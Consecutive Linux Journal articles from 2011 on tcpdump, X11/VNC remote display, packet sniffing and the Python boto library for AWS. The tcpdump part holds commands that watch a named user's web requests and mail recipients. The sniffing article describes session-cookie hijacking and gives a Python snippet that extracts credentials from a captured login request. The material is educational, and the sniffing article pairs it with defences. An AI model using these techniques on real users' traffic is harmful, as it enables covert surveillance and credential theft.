This may seem cryptic at first, but it makes more sense when you understand how protocol layers work. DNS is a more complicated protocol than ARP to begin with, but it also operates on a higher layer. This means it runs on top of other lower-level protocols, which also are displayed in the output.

Unlike ARP, which is a non-routable, layer-3 protocol, DNS is an Internet-wide protocol. It relies on UDP and IP to carry and route it across the Internet, which makes it a layer-5 protocol (UDP is layer-4, and IP is layer-3).

The underlying UDP/IP information, consisting of the source and destination IP/port, is displayed on the left side of the colon, followed by the remaining DNS-specific information on the right.

Even though this DNS information still is displayed in a highly condensed format, you should be able to recognize the essential elements if you know the basics of DNS. The first packet is a query for linuxjournal.com, and the second packet is an answer, giving the address 76.74.252.198. These are the kind of packets that are generated by simple DNS lookups.

See the "OUTPUT FORMAT" section of the tcpdump man page for complete descriptions of all the supported protocol-specific output formats. Some protocols are better served than others by their output format, but I've found that tcpdump does a pretty good job in general of showing the most useful information about a given protocol.

Capture Files

In addition to its normal behavior of printing packet descriptions to the screen, tcpdump also supports a mode of operation where it writes packets to a file instead. This mode is activated when the -w option is used to specify an output capture file.

When writing to a file, tcpdump uses a completely different format from when it writes to the screen. When writing to the screen, formatted text descriptions of packets are printed.
When writing to a file, the raw packets are recorded as is, without analysis.

Instead of doing a live capture, tcpdump also can read from an existing capture file as input with the -r option. Because tcpdump capture files use the universally supported "pcap" format, they also can be opened by other applications, including Wireshark. This gives you the option to capture packets with tcpdump on one host but perform the analysis on a different host by transferring and loading the capture file. This lets you use Wireshark on your local workstation without having to attach it to the network and location you need to capture from.

Analyzing TCP-Based Application Protocols

tcpdump is a packet-based analyzer, and it works great for connectionless, packet-based protocols like IP, UDP, DHCP, DNS and ICMP. However, it cannot directly analyze "connection-oriented" protocols, such as


HTTP, SMTP and IMAP, because they work completely differently.

They do not have the concept of "packets". Instead, they operate over the stream-based connections of TCP, which provide an abstracted communications layer. These application protocols are really more like interactive console programs than packet-based network protocols.

TCP transparently handles all of the underlying details required to provide these reliable, end-to-end, session-style connections. This includes encapsulating the stream-based data into packets (called segments) that can be sent across the network. All of these details are hidden below the application layer.

In order to capture TCP-based application protocols, an extra step is needed beyond capturing packets. Because each TCP segment is only a slice of application data, it can't be used individually to obtain any meaningful information. You first must reassemble the TCP sessions (or flows) from the combined sets of individual segments/packets. The application protocol data is contained directly within the sessions.

tcpdump doesn't have an option to assemble TCP sessions from packets directly, but you can "fake" it by using what I call "the tcpdump strings trick".

The tcpdump Strings Trick

Usually when I'm capturing traffic, it's just for the purpose of casual analysis. The data doesn't need to be perfect if it shows me what I'm looking for and helps me gain some insight. In these cases, speed and convenience reign supreme. The following trick is along these lines and is one of my favorite tcpdump techniques. It works because:

1. TCP segments usually are sent in chronological order.

2. Text-based application protocols produce TCP segments with text payloads.

3. The data surrounding the text payloads, such as packet headers, is usually not text.

4. The UNIX command strings filters out binary data from streams, preserving only text (printable characters).

5.
When tcpdump is called with -w -, it prints raw packets to STDOUT.

Put it all together, and you get a command that dumps real-time HTTP session data:

tcpdump -l -s0 -w - tcp dst port 80 | strings

The -l option above turns on line buffering, which makes sure data gets printed to the screen right away.

What is happening here is that tcpdump is printing the raw, binary data to the screen. This uses a twist on the -w option, where the special filename - writes to STDOUT instead of a file. Normally, doing this would display all kinds of gibberish, but that's where the strings command comes in: it allows only data recognized as text through to the screen.
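The filtering strings performs is easy to approximate in a few lines of Python (an illustration added here, not from the original article): scan a byte stream for runs of printable characters of some minimum length, which is exactly how text payloads pop out of the surrounding binary packet data. Unlike GNU strings, this sketch also treats carriage returns and newlines as printable, so a multi-line payload comes out as one run.

```python
import string

# Printable bytes, minus vertical tab and form feed.
PRINTABLE = set(string.printable.encode()) - set(b"\x0b\x0c")

def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Return runs of at least min_len printable bytes, roughly what
    `strings` does to tcpdump's raw packet stream."""
    runs, current = [], bytearray()
    for byte in data:
        if byte in PRINTABLE:
            current.append(byte)
        else:
            if len(current) >= min_len:
                runs.append(current.decode())
            current = bytearray()
    if len(current) >= min_len:
        runs.append(current.decode())
    return runs

# A fake captured packet: binary header bytes around an HTTP request.
packet = (b"\x00\x1a\x2b\xff"
          + b"GET / HTTP/1.1\r\nHost: example.com\r\n"
          + b"\x9c\x00")
for run in extract_strings(packet):
    print(run)
```

Raising min_len is the same knob as the min-len option mentioned below: longer runs mean fewer binary bytes that coincidentally look like text.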


There are a few caveats to be aware of. First, data from multiple sessions received simultaneously is displayed simultaneously, clobbering your output. The more refined you make the filter expression, the less of a problem this will be. You also should run separate commands (in separate shells) for the client and server sides of a session:

tcpdump -l -s0 -w - tcp dst port 80 | strings
tcpdump -l -s0 -w - tcp src port 80 | strings

Also, you should expect to see a few gibberish characters here and there whenever a sequence of binary data happens to look like text characters. You can cut down on this by increasing min-len (see the strings man page). This trick works just as well for other text-based protocols.

HTTP and SMTP Analysis

Using the strings trick from the previous section, you can capture HTTP data even though tcpdump doesn't actually understand anything about it. You then can "analyze" it further in any number of ways. If you wanted to see all the Web sites being accessed by "davepc" in real time, for example, you could run this command on the firewall (assuming the internal interface is eth1):

tcpdump -i eth1 -l -s0 -w - host davepc and port 80 \
  | strings | grep 'GET\|Host'

In this example, I'm using a simple grep command to display only lines containing GET or Host. These strings show up in HTTP requests and together show the URLs being accessed.

This works just as well for SMTP. You could run this on your mail server to watch e-mail senders and recipients:

tcpdump -l -s0 -w - tcp dst port 25 | strings \
  | grep -i 'MAIL FROM\|RCPT TO'

These are just a few silly examples to illustrate what's possible. You obviously could take it beyond grep. You could go as far as writing a Perl script to do all sorts of sophisticated things. You probably wouldn't take it that far, however, because at that point, there are better tools that actually are designed to do that sort of thing.

The real value of tcpdump is the ability to do these kinds of things interactively and on a whim.
It's the power to look inside any aspect of your network whenever you want, without a lot of effort.

Debugging Routes and VPN Links

tcpdump is really handy when debugging VPNs and other network connections, because it shows where packets are showing up and where they aren't. Let's say you've set up a standard routable network-to-network VPN between 10.0.50.0/24 and 192.168.5.0/24 (Figure 2). If it's operating properly, hosts on either network should be able to ping one another. However, if you are not getting replies when pinging host D from host A, for instance, you can use tcpdump to zero in on exactly where


Figure 2. Example VPN Topology

the breakdown is occurring:

tcpdump -tn icmp and host 10.0.50.2

In this example, during a ping from 10.0.50.2 to 192.168.5.38, each round trip should show up as a pair of packets like the following, regardless of which of the four systems the tcpdump command is run from:

IP 10.0.50.2 > 192.168.5.38: ICMP echo request, id 46687, seq 1, length 64
IP 192.168.5.38 > 10.0.50.2: ICMP echo reply, id 46687, seq 1, length 64

If the request packets make it to host C (the remote gateway) but not to D, this indicates that the VPN itself is working but there could be a routing problem. If host D receives the request but doesn't generate a reply, it probably has ICMP blocked. If it does generate a reply but the reply doesn't make it back to C, then D might not have the right gateway configured to get back to 10.0.50.0/24. Using tcpdump, you can follow the ping through all eight possible points of failure as it makes its way across the network and back again.

Conclusion

I hope this article has piqued your interest in tcpdump and given you some new ideas. Hopefully, you also enjoyed the examples, which barely scratch the surface of what's possible.

Besides its many built-in features and options, as I showed in several examples, tcpdump can be used as a packet-data conduit by piping into other commands to expand the possibilities further, even if you do manage to exhaust its extensive "advertised" capabilities. The ways to use tcpdump are limited only by your imagination.

tcpdump also is an incredible learning tool. There is no better way to learn how networks and protocols work than by watching their actual packets. Don't forget to check out the tcpdump and pcap-filter man pages for additional details and information.■

Henry Van Styn is the founder of IntelliTree Solutions, an IT consulting and software development firm located in Cincinnati, Ohio. Henry has been developing software and solutions for more than ten years, ranging from sophisticated Web applications to low-level network and system utilities.
He is the author of Strong Branch Linux, an in-house server distribution based on Gentoo. Henry can be contacted at www.intellitree.com.

Resources

tcpdump and libpcap: www.tcpdump.org
Wireshark: www.wireshark.org
TCP/IP Model: en.wikipedia.org/wiki/TCP/IP_model


INDEPTH

Remote Viewing—Not Just a Psychic Power

More and more often these days, you need to work on remote machines. What can you do when the command line isn't enough? JOEY BERNARD

Most people today are used to having a nice, intuitive graphical environment when they sit down to use a computer. Gone are the days of using a DOS machine or being lucky enough to have a dial-up account at 300 baud on a UNIX mainframe. Today, most people expect to be able to point and click their way to work nirvana, even when that work is being done on some other machine over a network. In this article, I look at some of the available options and what their relative costs and benefits are, and hopefully, by the end, you will have enough information to choose the best option for you.

Before I begin, though, I should take a look at what actually is involved in using a GUI on Linux. The overwhelming majority of Linux users will be using the X11 Window System (typically shortened to just X11). X11 has been around since 1987. Since then, it has gone through several revisions, and it's currently at R7. Any X11 installation you are likely to encounter will be some version of X11R7. There have been attempts to replace it, including Wayland, Berlin/Fresco and the Y Window System, but they are fairly rare out in the wild, and you'll need to go out of your way to run into them.

X11 is built on a client-server model. In this model, the X11 server is the part that actually draws on a physical screen. As such, it is the part you end up running on your desktop in front of you. The client portion in this model is the user-space program that has output that needs to be seen by the end user. The client does this by sending requests to the X11 server. These are high-level requests of the form "Draw a window", "Add text to the window border" or "Move the window to the right by x pixels". Because of this, there potentially can be a lot of


communication if a lot is going on.

Figure 1. The X11 Window System (from Wikipedia)

When most people experience X11, both parts of this model are running on the desktop in front of them. But, this isn't the only option. There is no reason for the client and server to be on the same machine, or even on the same continent. Because everything is done by sending messages, those messages easily can be sent over a network connection.

The first thought that should come to you is "Hey, I can open a window on my friend's machine and display rude pictures there." Unfortunately, the writers of the X11 specification have beaten you there and closed that particular hole. By default, X11 servers are configured not to accept connections from clients on the network. You have to allow this explicitly. You can use two separate mechanisms to allow external connections. The older one is called xhosts. With xhosts, you tell the X11 server to accept connections from the hosts that you permit. The command looks like this:

xhost +111.222.333.444

The newer authentication mechanism is called xauth. In this method, the X11 server creates a cookie that is required in order to connect to the X11 server. If you want to connect to the X11 server from a remote machine, you need to copy this cookie over to the remote machine. An example of doing this, from the xauth man page, is:

xauth extract - $DISPLAY | ssh otherhost xauth merge -

This command pulls out the cookie for the current X11 server, "SSHes" it over to the remote machine and merges it into the user's xauth file.

Once you have done this, how do client


applications go ahead and connect to your X11 server? All programs that run under X11 accept certain command-line options. One of these is -display. With this option, you can tell your client program which X11 server to connect to and send its output to. The general form of this option is:

-display hostname:display#.screen#

The reason for all of the parts of this option is that a given machine could be running more than one X11 server, and each server could be running more than one display screen. The first server and screen are labeled 0.0, so in most cases you will use:

-display hostname:0.0

As an aside, you can do this on your own desktop. If you open a terminal, you can run an X11 client program with:

-display :0.0

and it will show up on your default desktop.

A consequence of this is that you need to have a connection to the remote machine that will be running the client program. Most times, this will be an SSH connection between your local machine and the remote machine. Luckily, SSH provides the ability to tunnel X11 traffic over your SSH connection for you. This tunneling happens "out-of-band", so to speak. You start a session by SSHing in to your remote machine using either the -X or -Y option. The -X option is the preferred method. It sets up a secure X11 socket on the remote machine using xauth as the authentication system. Unfortunately, some X11 servers have a hard time with this, so you can use -Y instead. This essentially turns off any authentication; it is equivalent to using xhost +.

Once your SSH connection is established, a new X11 socket is created on the remote machine, and the environment variable DISPLAY is set to point to it. From here on, any X11 applications you start on this remote machine will send their output to the X11 server on your desktop. When you do this, you may notice something: in most cases, it is unbelievably slow, and slower still if the machine you are connecting to is any appreciable distance away.
Due, in part, to this issue, the SSH developers have included an extra option, -C. This turns on compression of the data traveling over the SSH connection. A side effect is that the packets containing the X11 protocol instructions get bunched together and sent as a single unit. This makes much more efficient use of the available bandwidth, because you are cutting down on the amount of control data that also gets sent over the line.

As I mentioned above, both X11 and X11 over SSH are notoriously slow; in some cases, they are nearly unusable. Luckily, there's another option available: VNC. VNC also follows the client/server model, but it reverses the location of the client and server from what you might be used


to with X11. With VNC, you run a server out on the remote machine and then use a client on your desktop in front of you. You can run a VNC server in the background, where it sits and acts like any other service. It also doesn't use any of the standard X11 sockets, so it will not interfere with any standard X11 desktop that also may be running on the remote machine. Because it runs as a service, it can continue to run whether you are connected to it or not. You can think of it as a GUI version of the old standby, screen.

There also are client applications for all the major operating systems, and they are much lighter weight than a full X11 server. So, you can start up vncserver on the remote machine, connect to it from your Windows box, start some long-running process, disconnect and go home, and then check on its progress from your Linux box. This is a great improvement over straight X11. Also, you will notice that in most cases, it is a bit more responsive than X11 was. This is due to the amount of information being sent back and forth between the client and server parts of VNC.

The server command is simply vncserver. When you run this command, a directory named .vnc is created in your home directory if it doesn't already exist. If a password has not been set yet for this instance of the VNC server, it will ask you to enter one. It is saved in the file passwd in encrypted form. If you want to change it, you can use the command vncpasswd. In this directory, you also should find log files for each instance of vncserver that you start, as well as a pid file containing the PID of any currently running instance of vncserver. The last file of interest is the xstartup file. This is the file that is used when you start vncserver to set up all the required options and lay out what will be run on the vncserver desktop.
The defaults on my Ubuntu system look like this:

#!/bin/sh

xrdb $HOME/.Xresources
xsetroot -solid grey
#x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
#x-window-manager &

# Fix to make GNOME work
export XKL_XMODMAP_DISABLE=1
/etc/X11/Xsession

So in this case, it sets the background to gray and then tries to run whatever session is defined in the global script Xsession. This is where you can do some editing and make


it your own. I prefer Fluxbox as a window manager on smaller screens, so you can simplify this to:

#!/bin/sh

xrdb $HOME/.Xresources
startfluxbox

Figure 2. Fluxbox Running under vncserver

Starting this gives you a nice-looking desktop running Fluxbox. If the client that is going to be connecting has to deal with a smaller screen size (like on a Netbook), you can set the desktop size on the command line with the -geometry option. You also can set the color depth of the virtual desktop with the -depth option. So, to set up a server that looks nice when I connect to it from my Netbook, I would use this:

vncserver -geometry 800x600

Now, what about the other end? There are two general classes of vncviewer applications: GUI and command line. The GUI versions, like the most common ones for Mac OS X and Windows, have point-and-click access to all the relevant options. They also have them in different locations, depending on who wrote your particular favorite viewer. Because VNC is a protocol (kind of like FTP or HTTP), there is a great deal of variation in what you get from the various implementers. Let's look at the


command-line versions here and see what you can do with those. The GUI versions should have comparable options available. To connect to a vncserver, you would run:

vncviewer hostname:port

where hostname is either the true hostname of the remote machine or its IP address, and port is the number of the port on which the vncserver is listening, starting at 1. This number is added to the default starting port number 5900, so the actual network port number in this case is 5901. This will try to connect to the given server, and it will ask for a password if one was set during vncserver's startup. Then, you get a nice Fluxbox desktop.

There are lots of options for changing various parts of what is being transmitted, such as the encoding algorithm, the compression level and the quality level. Playing with these options can improve your session's responsiveness, potentially at the cost of some image quality. Depending on what work you are trying to do, this may not be a trade-off you are willing to make.

Although you can force some kind of authentication on VNC, that may not be enough in these security-conscious days. You may have to work with a remote machine that sits behind a firewall that allows only SSH traffic. What can you do? VNC allows for tunneling of the protocol over an SSH connection by using the -via gateway option. This gateway machine is the machine that you are SSHing in to for the tunneling. If this is the same machine as your vncserver, the command would
In this case, it wouldlook like this:vncviewer -via user@gateway.com someotherhost.com:1Be aware that VNC still will ask you toauthenticate after the SSH session hasbeen established.ConclusionHopefully, this article has provided someoptions for those times when you just can’tlive without a nice graphical interface. Evenwhen you are forced to squeeze throughan SSH connection, you still can have all ofthat great GUI goodness. If you know ofother ways of getting a graphical interfaceon a remote machine, I would love to hearabout them.■Joey Bernard spends his days helping university researchersdo scientific computing. But by night, he is a masked crusaderfighting crime—at least, once he gets the kids to sleep and canhit the sack himself.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 103


INDEPTH

Packet Sniffing Basics

Your data isn't safe on public networks. You may not even realize the extent to which that statement is true. ADRIAN HANNAH

Imagine this: you're sitting in your local coffee shop sucking down your morning caffeine fix before heading into the office. You catch up on your work e-mail, you check Facebook and you upload that financial report to your company's FTP server. Overall, it's been a constructive morning. By the time you get to work, there's a whirlwind of chaos throughout the office. That incredibly sensitive financial report you uploaded was somehow leaked to the public, and your boss is outraged by the crass and unprofessional e-mail you just sent him. Was there some hacker lurking in the shadows who broke into your company's network and decided to lay the blame on you? More than likely not. This mischievous ne'er-do-well probably was sitting in the coffee shop you stopped at and seized the opportunity.

Without some form of countermeasures, your data isn't safe on public networks. This example is a worst-case scenario on the far end of the spectrum, but it isn't so far-fetched. There are people out there who are capable of stealing your data. The best defense is to know what you can lose, how it can get lost and how to defend against it.

What Is Packet Sniffing?

Packet sniffing, or packet analysis, is the process of capturing any data passed over the local network and looking for any information that may be useful. Most of the time, we system administrators use packet sniffing to troubleshoot network problems (like finding out why traffic is so slow in one part of the network) or to detect intrusions or compromised workstations (like a workstation that is connected to a remote machine on port 6667 continuously when you don't use IRC clients), and that is what this type of analysis originally was designed for. But, that didn't stop people from finding

Figure 1.
A Capture of a Packet of SomeoneTrying to Log In to a Web Site104 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM
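The port-6667 check mentioned above is a good illustration of what a sniffer actually does with each captured packet: it reads fixed-position fields out of the protocol headers. Here is a minimal, hypothetical sketch in Python of that header-reading step, run against synthetic bytes rather than a live capture (a real sniffer would need a raw socket and root privileges); the layout assumptions are spelled out in the comments:

```python
import struct

def tcp_dest_port(ip_packet):
    """Return the TCP destination port of a raw IPv4 packet.
    The low nibble of the first byte (IHL) gives the IP header length
    in 32-bit words; the TCP destination port is the second 16-bit
    field of the TCP header that follows."""
    ihl = (ip_packet[0] & 0x0F) * 4              # IP header length in bytes
    src_port, dst_port = struct.unpack("!HH", ip_packet[ihl:ihl + 4])
    return dst_port

# Build a synthetic packet: a 20-byte IPv4 header (version 4, IHL 5,
# protocol 6 = TCP) followed by the first 4 bytes of a TCP header
# addressed to port 6667.
ip_header = bytearray(20)
ip_header[0] = 0x45      # version 4, header length 5 words
ip_header[9] = 6         # protocol: TCP
packet = bytes(ip_header) + struct.pack("!HH", 50000, 6667)

if tcp_dest_port(packet) == 6667:
    print("possible IRC traffic")
```

Everything else a sniffer does—flagging, logging, reassembling streams—is built on top of field reads like this one.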


more creative ways to use these tools. The focus quickly moved away from its original intent—so much so that packet sniffers are considered security tools instead of network tools now.

Figure 2. Tools like NetworkMiner can reconstruct images that have been broadcast on the network.

Finding out what someone on your network is doing on the Internet is not some arcane and mystifying talent anymore. Tools like Wireshark, Ettercap or NetworkMiner give anybody the ability to sniff network traffic with a little practice or training. These tools have become increasingly easy to use and continue to make things easier to comprehend, which makes them more usable by a broader user base.

How Does It Work?

Now, you know that these tools are out there, but how exactly do they work? First, packet sniffing is a passive technique. No one actually is attacking your computer and delving through all those files that you don't want anyone to access. It's a lot like eavesdropping. My computer is just listening in on the conversation that your computer is having with the gateway.

Typically, when people think of network traffic, they think that it goes directly from their computers to the router or switch and up to the gateway and then out to the Internet, where it routes similarly until it gets to the specified destination. This is mostly true except for one fundamental detail. Your computer isn't directly sending the data anywhere. It broadcasts the data in packets that have the destination in the header. Every node on your network (or switch) receives the packet, determines whether it is the intended recipient and then either accepts the packet or ignores it.

For example, let's say you're loading the Web page http://example.com on your computer "PC". Your computer sends the request by basically shouting "Hey! Somebody get me http://example.com!", which most nodes simply will ignore. Your switch will pass it on to where it eventually will be received by example.com, which will pass back its index page to the router, which then shouts "Hey! I have http://example.com for PC!", which again will be ignored by everyone except you. If others were on your switch with a packet sniffer, they'd receive all that traffic and be able to look at it.

Picture it like having a conversation in a bar. You can have a conversation with someone about anything, but other people are around who potentially can eavesdrop on that conversation, and although you thought the conversation was private, eavesdroppers can make use of that information in any way they see fit.

What Kind of Information Can Be Gathered?

Most of the Internet runs in plain text, which means that most of the information you look at is viewable by someone with a packet sniffer. This information ranges from the benign to the sensitive. You should take note that all of this data is vulnerable only through an unencrypted connection, so if the site you are using has some form of encryption like SSL, your data is less vulnerable.

The most devastating data, and the stuff most people are concerned with, is user credentials. Your user name and password for any given site are passed in the clear for anyone to gather. This can be especially crippling if you use the same password for all your accounts on-line. It doesn't matter how secure your bank Web site is if you use the same password for that account and for your Twitter account.
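To see how little work "passed in the clear" implies, here is a small, hypothetical sketch: the string below stands in for a sniffed, unencrypted HTTP POST (the host and field names are invented), and recovering the credentials from it is plain string parsing, with no cryptography involved:

```python
# A captured, unencrypted HTTP POST as it might appear in a packet
# sniffer. The host and form-field names here are invented for
# illustration -- they are not from any real capture.
captured = (
    "POST /login HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "username=jdoe&password=hunter2"
)

def extract_credentials(payload):
    """Split a sniffed POST into headers and body, then read the
    form fields out of the body -- ordinary string work."""
    headers, _, body = payload.partition("\r\n\r\n")
    fields = dict(pair.split("=", 1) for pair in body.split("&"))
    return fields.get("username"), fields.get("password")

user, password = extract_credentials(captured)
print(user, password)  # jdoe hunter2
```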
Further, if you type your credit-card information into an unsecure Web page, it is just as vulnerable, although there aren't many (if any) sites that continue this practice for that exact reason.

There is a technique in the security world called session hijacking where an attacker uses a packet sniffer to gain access to a victim's session on a particular Web site by stealing the victim's session cookie for that site. For instance, say I was sniffing traffic on the network, and you logged in to Facebook and left the Remember Me On This Computer check box checked. That signals Facebook to send you a session cookie that your browser stores. I potentially could collect that cookie through packet sniffing, add it to my browser and then have access to your Facebook account. This is such a trivial task that it can be scripted easily (someone even has made a Firefox extension that will do it automatically), and there still aren't many Web sites that encrypt their traffic to the end user, making it a significant problem when using the public Internet.

CARNIVORE

Carnivore was a system implemented by the Federal Bureau of Investigation that was designed to monitor e-mail and electronic communications. It used a customizable packet sniffer that can monitor all of a target user's Internet traffic.

Figure 3. A Firefox Extension Designed to Gather Unencrypted Session Cookies from the Network

Packet sniffers exist that are specifically designed for monitoring what you are up to on the Internet. They will rebuild the exact Web page you are looking at, photos you're browsing, videos you're watching, and even files you're downloading. These applications are tailored to look through a string of packet captures to find various packet streams and reassemble them on the fly. My roommate in college whipped up something that would display the contents of my browser in real time on his computer (a scary revelation indeed).

E-mail is another one of those things that people tend to get up in arms about, because there's an assumption of privacy in e-mail that is derived from the regular mail system. Your e-mail is sent out and viewable, just like anything else that emanates from your computer onto the network.
E-mail sniffing is what made the FBI's Carnivore program so infamous.

Since every packet bears a destination address in its header, it's possible that someone could sniff the network just to gather a browsing history of everyone on that segment. This may not be very insidious, but it's gathered data, and there's always someone willing to pay for all sorts of data.

Precautions

I'm sure you're currently seconds from taking a pair of scissors to your network cable and swearing off the Internet for life, but fear not! There are less-drastic measures you can take to prevent such sensitive data loss. None of these precautions is the magic cure for eavesdroppers, but using even one of them will make you a less-desirable target. There's an old joke that says that when you're being chased by a bear, you don't need to outrun the bear, just the guy in front of you. You don't have to have the most secure computer on the block, just more secure than somebody else's. As with most network security, if people really want your data, they can get at it. However, most of the time, attackers aren't targeting a specific person, they're looking for targets of opportunity, so the more secure you are, the less likely you are to be such a target.

The first defense against eavesdropping is the Secure Socket Layer (SSL) used by most Web pages that handle sensitive information. This forces all the content shared back and forth between you and the site to be encrypted. Some sites use SSL for their login pages only. Most sites don't even use SSL at all. It's easy to tell—the URL in the address bar will start with https instead of http. Some sites offer you some choice in the matter. For instance, Google allows you to turn SSL on all the time within Gmail, thus encrypting all your e-mail traffic.

Modern network switches are designed to pass data intelligently to avoid packet collisions and excessive network traffic. If a packet is broadcast that is not intended for one of the nodes attached to it, the router will not rebroadcast to the local nodes. Likewise, if a packet is broadcast locally that is intended for another local node, the switch will not rebroadcast to the outside network. This forces strict segmentation on a network. For us, this means that someone using a packet sniffer on a switched network will not see any traffic from hosts not attached to the same switch. This doesn't mean much on small-scale networks, like you have at your house, but on a larger scale, it means that somebody can't sit in the breakroom sniffing traffic three floors up from the accounting department.

Wireless network encryption has come a long way in its short lifespan—going from no encryption to Wired Equivalent Privacy (WEP) encryption to Wi-Fi Protected Access (WPA) encryption. Wireless networks don't provide the same segmentation that the previously mentioned switches provide, meaning that any packet transmitted on a wireless access point gets rebroadcast to everyone else on the access point. Even though your traffic is encrypted under WEP, this encryption protects only the data from users not connected to that wireless network. The encryption scheme and key are identical for all users, so all your "encrypted" data is decryptable by anyone on the network, making your data essentially unencrypted. WPA solves this issue by isolating all users on the network and giving them a different encryption scheme even when the key is the same.

If you have SSH access to a computer outside your current network (which I'm sure most of us do), you can tunnel all your traffic through an SSH connection (for example, a command along the lines of ssh -D 1080 user@remotehost sets up a local SOCKS proxy that a browser can point at). You essentially are using the encryption of the SSH connection to protect all your data from eavesdroppers. There are two apparent downsides to this technique. First, your connection speed will drop, because now instead of going from you to the destination and back, your traffic will go from you to the SSH server to the destination and back. Second, your data is transmitted unencrypted from the remote end, so if that machine is vulnerable to packet sniffing, your data is no safer than it was at your local machine.

Virtual private networks are intended to allow users access to a network that otherwise would be inaccessible. However, they also can be used to protect your traffic, because VPN connections are encrypted. You can set up a private VPN for yourself just for this purpose, but it will have the same disadvantages as SSH tunneling. If you work for a company that has a VPN, you may be allowed to use it for this purpose, but your traffic will fall under the same policy and rules that you have in your office, so be careful what you use it for.■

Adrian Hannah is a self-proclaimed hacker with a penchant for privacy-minded political issues. He has worked as a system administrator in one capacity or another for more than ten years and has a strong computer science background founded in his early childhood. He is a biker (with no bike), a martial artist (with no dojo), a TV junkie (with no cable), a rebel (without a cause) and a horse (with no name). You can reach him on Twitter (@codemonkey2841).


Python in the Cloud

A basic introduction to using the Python boto library to interact with AWS services and resources. ADRIAN KLAVER

This article explores using the boto library to work with resources in the Amazon Web Services (AWS) cloud. For those wondering, the boto name refers to a species of freshwater dolphin found in the Amazon river. boto is maintained by Mitch Garnaat, who works on the Eucalyptus team at Canonical. The library covers many, though not all, services offered by AWS (see the boto Web site for a current listing).

But, before I start on the use and care of boto, let me take a little diversion. It probably goes without saying, but you need to set up an AWS account if you want to play along. If you already have an Amazon account, you just need to register with Amazon at the AWS site (see Resources) to set up your AWS account. Otherwise, you need to set up an Amazon account first. As part of the setup for your AWS account, you will be issued some credentials (you will be using those later). Note, if you are a new user to AWS, check out the free tier offer (see Resources). This allows you to kick the tires at no charge for the most part. For this article, I try to stick to the offer restrictions as much as possible.

With the AWS setup out of the way, let's move on to installing boto. At the time of this writing, the current version is 2.0b4, which is what I use in this article. boto is available from the Python Package Index (PyPI), and you can install it with easy_install boto. Remember, if you want it to be a system-wide library, do the previous as a superuser. You also can go to either PyPI or the boto site and download a tarball, and then do a Python setup.py install. The PyPI site has the latest version only; the boto site has a variety of versions available.

Now that the housekeeping's done, it's time to play. As mentioned above, boto allows you to access many of the AWS services—in fact, many more than I have space to cover here. This article covers the Amazon Machine Image (AMI), Elastic Block Store (EBS), Elastic Compute Cloud (EC2), Simple Storage Service (S3) and Simple Notification Service (SNS). Where an AMI is a virtual machine, an EBS is a virtual hard drive, EC2 is the cloud you run an AMI/EBS combo in, S3 is key/object storage, and SNS is a messaging system from the cloud. In all these cases, account information is needed for boto to access AWS. You'll need the AWS Access Key and the AWS Secret Access Key. They were created when you signed up, but if you did not record them, don't fret. They are available in your AWS account page as Security Credentials.

To make things easier and more secure, there are alternatives to including the information in the connection string. The first option is to create the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY environment variables and set them equal to the respective keys. The other option is to create a .boto file in your home directory and, using ini style, set the keys (Listing 1).

Before going further, I should point out that AWS has a Web-based management tool for most of its services. It is called the AWS Management Console, and you can reach it by going to the AWS site and clicking on the Account tab at the top of the page (I make reference to and use this tool for some of what is to follow). The management console also is handy for confirming that the boto code actually is doing what it is supposed to be doing. Just remember to click the Refresh button at the top of the Console when in doubt.

Listing 1. boto Configuration File

# .boto file format
[Credentials]
aws_access_key_id = 
aws_secret_access_key = 

What follows is a basic look at the interaction between boto and AWS. The code is kept simple both to conserve space and illustrate basic principles. To get started, I need to create an AMI of my own to work with. The easiest way to do that is to grab an existing public image and make it private. I use the Ubuntu images maintained by Canonical for my own use. The best place to find what is available is the Alestic site (see Resources). It has a handy table labeled "Ubuntu and Debian AMIs for Amazon EC2" with tabs for the AWS regions. Click on the region you want, and then select the appropriate image.
For this article, I selected the Ubuntu 10.04 LTS 64-bit EBS AMI in the US-East-1 region with an AMI ID of ami-2ec83147 (the ID may be different as new images are built; see the EBS/S3 AMI sidebar). Clicking on the arrow next to the image takes me to the AWS Management Console (after login) to start an instance from the image. To make use of the free tier, I selected the micro instance. At this point, there is an instance of a public image running on my account.

To make a private image, I could use the management console by right-clicking on the instance and selecting Create Image, but where is the fun in that? Let's use boto to do it instead (Listing 2). It's simple. Import the boto convenience function connect_ec2, and note the lack of access credentials in the connection code. In this case, they are in a .boto file in my home directory. Then, I use create_image() to create and register a private AMI using the running instance (i-c1315eaf), launched from the management console, with the name lj_test. The create_image function returns the AMI ID—in this case, ami-7eb54d17.

EBS vs. S3 AMI

Here's some enlightenment on the differences between an EBS-backed and an S3-backed AMI. S3 AMIs were the rule when AWS first started. They stored the image root device as a series of data chunks in the AWS S3 storage service. S3-backed AMIs also are referred to as instance store AMIs. Later, EBS-backed AMIs were made available. These store the root device as an EBS volume. This has some practical considerations, such as the following:

■ Maximum root device size of the S3 is 10GiB and of the EBS is 1TiB.

■ The boot time is faster with EBS, because the root device does not have to be assembled first.

■ Stop: EBS AMI instances have the ability to be stopped, which is roughly equivalent to a paused state, in addition to being terminated. S3-backed instances only can be terminated.

For a more-detailed comparison, see the URL listed in the Resources for this article.

The next step is to put the image to use by launching an instance or instances of it. For this, see the line in Listing 2 with con.run_instances(). The AMI previously created is used as the template for the instances.

The min_count and max_count parameters need some explaining. AWS has a default limit of 20 instances that can be running per region (this can be increased by filling out a request form) per account. This is where the min/max count comes into play. If I already had 18 instances running in a region and I set the min_count at 2 and the max_count at 5, two new instances will be launched.

The key name is an SSH keypair generated by Amazon that is used for SSH access to the instance(s). The instance_type is set to the EC2 micro instance, and it is slotted to run in the us-east-1d availability zone by the placement parameter. Let's take a brief side trip on AWS availability zones.
Availability zones are relative to your account. In other words, my us-east-1d may not represent the same physical availability zone as your us-east-1d.

The final parameter, disable_api_termination=True, is a lock-out mechanism. It prevents the termination of an instance using API termination calls. An instance with this protection in force has to have that parameter first changed to False and then have a termination command given in order for it to go away. See the modify_instance_attribute() line for how to undo the termination protection on a running instance.

